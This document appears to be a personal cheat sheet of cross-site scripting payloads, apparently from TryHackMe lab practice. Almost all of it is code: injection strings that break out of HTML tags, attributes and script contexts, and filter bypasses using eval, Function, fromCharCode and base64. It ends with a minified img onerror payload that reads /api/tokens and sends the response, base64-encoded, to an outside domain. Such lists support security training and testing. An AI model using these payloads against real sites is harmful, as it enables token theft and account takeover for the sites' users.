Skip to content

Cross-site scripting (XSS)

injection point 1 

<div>
{name}
</div>

<script>alert(1)</script>

<div>
<script>alert(1)</script>
</div>

injection point 2 

<h2> {name} </h2>

michal</h2><script>alert('THM')</script><h2>

<h2> michal</h2><script>alert('THM')</script><h2> </h2>

injection point 3 

<input value="{name}">

michal"><script>alert('THM')</script><img id="

<input value="michal"><script>alert('THM')</script><img id="">

injection point 4 

<textarea> {name} </textarea>

michal</textarea><script>alert('THM')</script><textarea>

<textarea> michal</textarea><script>alert('THM')</script><textarea> </textarea>

injection point 5 

<script>
document.getElementsByClassName('name')[0].innerHTML='{name}';
</script>

michal'; alert('THM'); //

<script>
document.getElementsByClassName('name')[0].innerHTML='michal'; alert('THM'); //';
</script>

injection point 6 

<h2>Hello, michal</h2>


<h2>Hello, <script>alert(1)</script></h2>

<h2>Hello, alert(1)</h2>


<h2>Hello, <scr<script>ipt>alert(1)</scr<script>ipt></h2>

<h2>Hello, <script>alert(1)</script></h2>

injection point 7 

<img src="{name}">

/images/cat.jpg" onload="alert('THM')" id="

Example 1

// allowed - eval, disallowed - alert

eval('alert(`XSS`)')

eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))

// allowed - Function, disallowed - eval, alert

new Function('alert(`XSS`)')()

new Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()

// allowed - Function, disallowed - eval, alert, new

Function('alert(`XSS`)')()

Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()

// allowed - Function, disallowed - eval, alert, new

new Function('alert(`XSS`)')()

Function.call({}, 'alert(`XSS`)')()

Function.call({}, String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()

// allowed - Function, disallowed - eval, alert, new, {}

new Function('alert(`XSS`)')()

Function.call(this, 'alert(`XSS`)')()

Function.call(this, String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()

Example 2

<img src='#' onerror='alert(1)' />

<img src='#' onerror='(function(){alert(1);return false;})();return false;' />

xhttp = new XMLHttpRequest(); 
xhttp.onload = function(){alert(this.responseText)}; xhttp.open('GET','/api/tokens');  
xhttp.send();

eval(atob(".................."));
eval(atob('..................'));
eval(atob(`..................`));

<img src=0 onerror='eval(atob(`eGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgCnhodHRwLm9ubG9hZCA9IGZ1bmN0aW9uKCl7YWxlcnQodGhpcy5yZXNwb25zZVRleHQpfTsgeGh0dHAub3BlbignR0VUJywnL2FwaS90b2tlbnMnKTsgIAp4aHR0cC5zZW5kKCk7`))'/>

Example 3

a = new XMLHttpRequest(); 
a.onload = function(){
    b = new XMLHttpRequest();
    b.open('GET','//michalszalkowski.com?'+btoa(this.responseText)); 
    b.send();
}; 
a.open('GET','/api/tokens');
a.setRequestHeader('Hacker', 'Szalek');
a.send();

(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()

<img src=0 onerror='(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()'/>